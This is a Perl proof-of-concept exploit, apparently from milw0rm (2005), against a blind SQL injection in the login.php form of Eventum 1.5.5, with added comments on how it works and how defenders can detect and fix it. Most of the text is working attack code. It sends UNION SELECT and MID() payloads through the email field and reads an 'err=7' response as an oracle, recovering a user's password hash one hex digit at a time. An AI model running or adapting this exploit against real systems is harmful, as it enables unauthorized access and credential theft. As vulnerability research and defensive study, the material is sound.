MySQL Eventum 1.5.5 login.php SQL Injection Exploit

  1    #!/usr/bin/perl −w
  2    use IO::Socket;
  3    use strict;
# Proof-of-concept for a boolean-based blind SQL injection in the login form
# of Eventum <= 1.5.5: the "email" parameter of login.php is interpolated
# into a query (see the POST body built below).  The script recovers, one
# hex digit at a time, the stored usr_password value of the user whose
# usr_id is $user, by sending one yes/no probe per (position, candidate)
# pair and treating an "err=7" marker in the reply as "yes".
# Worst case is 32 positions x 16 candidates = 512 POST requests to
# login.php, which is the footprint a defender should hunt for: a burst of
# POSTs whose email field carries UNION SELECT, MID( and a trailing "/*"
# comment, all within seconds.  The application-side fix is to bind the
# email value as a parameter (or strictly escape it); WAF signatures on the
# tokens above and rate-limiting of login failures only reduce exposure.
# Note on this listing: the "−" (U+2212) and the curly quotes are
# PDF-extraction artefacts of the ASCII "-" and "'" in the original file,
# and the leading number on each line is the document's own gutter.
  4
  5    print   "#################################\n";
  6    print   "# MySQL Eventum <= v1.5.5 SQL Injection PoC #\n";
  7    print   "# James Bercegay // gulftech.org // 7−28−05 #\n";
  8    print   "#################################\n";
  9
# Probe target and parameters.  $user is the usr_id whose password hash is
# extracted; $pass accumulates the recovered hex digits in position order.
  10   my   $host   =   ’localhost’;
  11   my   $path   =   ’/eventum/login.php’;
  12   my   $user   =   ’2’;
  13   my   $port   =   80;
  14   my   $pass   =   ’’;
  15
# Candidate alphabet: the 16 lowercase hex digits.  Together with the 32
# positions walked by OUTER this is shaped for a 32-character hex digest
# (presumably MD5 — the stored format is not visible here).
  16   my @char = (’0’,’1’,’2’,’3’,’4’,’5’,’6’,’7’,’8’,’9’,’a’,’b’,’c’,’d’,’e’,’f’);
  17
  18   print "[*] Trying $host\n";
  19
# OUTER walks positions 1..32 of usr_password; INNER tries each hex digit
# at that position and stops (last INNER) on the first positive oracle.
  20   OUTER: for       ( my $i = 1; $i < 33; $i++ )
  21   {
  22   INNER: for       ( my $j=0; $j < 16; $j++ )
  23   {
  24   my $used =       $char[$j];
# One fresh TCP connection per probe; a connect failure aborts the run.
  25   my $sock =       IO::Socket::INET−>new( PeerAddr => $host, PeerPort => $port, Proto => ’tcp’ ) || die "[!] Unable to connect to $host\
        n";
  26
# The injected condition lives in the email field: a quote closes the
# original string, UNION SELECT supplies a constant 32-hex-char row, and
# the WHERE clause compares MID(usr_password,$i,1) with the candidate
# digit; the trailing %2F* ("/*") comments out the remainder of the query.
# "dance" is an arbitrary passwd value; the constant "3355d92c..." is
# presumably the hash login.php expects for it — TODO confirm against the
# 1.5.5 source.  Only when the MID() comparison holds does the UNION row
# come back, which is what turns the reply into the oracle below.
  27   my $post = "cat=login&url=&email=%27+UNION+SELECT+%273355d92c04a3332339b767f9278405ff%27+FROM+eventum_user+WHERE+usr_id=$user+AND+M
        ID(usr_password,$i,1)=’$used’%2F*&passwd=dance&Submit=Login";
# Hand-built HTTP/1.1 POST; Content-length is computed from the body.
  28   my $send = "POST $path HTTP/1.1\r\n";
  29   $send .= "Host: $host\r\n";
  30   $send .= "User−Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en−US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6\r\n";
  31   $send .= "Connection: Keep−Alive\r\n";
  32   $send .= "Content−type: application/x−www−form−urlencoded\r\n";
  33   $send .= "Content−length: ".length($post)."\r\n\r\n";
  34   $send .= "$post\r\n\r\n";
  35
  36   print $sock $send;
  37
# Read the reply line by line until the server closes the connection.
  38   while ( my $line = <$sock> )
  39   {
# Oracle: any reply line containing "err=7" is taken as "condition true".
# What err=7 denotes in login.php's redirect is not visible here — assumed
# to be the post-authentication error code that only the UNION row
# produces.  The surrounding (.*) groups are never used.
  40   if ( $line =~ /(.*)err=7(.*)/is )
  41   {
  42   $pass .= $used;
  43   print "[+] Char $i is $used\n";
  44   last INNER;
  45   }
  46   #/if
  47   }
  48   #/while
  49
  50   close($sock);
James Bercegay                                                                                                                     08/05/2005
                                 MySQL Eventum 1.5.5 login.php SQL Injection Exploit   Page 2/2
  51   }
  52   #/for INNER
  53
# Vulnerability check.  Because $pass is only ever empty before the first
# digit is found, this test is effectively evaluated for position 1 only;
# a later position with no matching candidate simply appends nothing and
# the loop moves on, so a partial result is possible.
  54   if ( length($pass) < 1 )
  55   {
  56   print "[!] Host not vulnerable!";
  57   exit;
  58   }
  59   }
  60   #/for OUTER
  61
# Whatever was recovered: a lowercase hex string of at most 32 digits.
  62   print "[+] Pass hash is $pass\n";
  63   exit;
  64
  65   # milw0rm.com [2005−08−05]



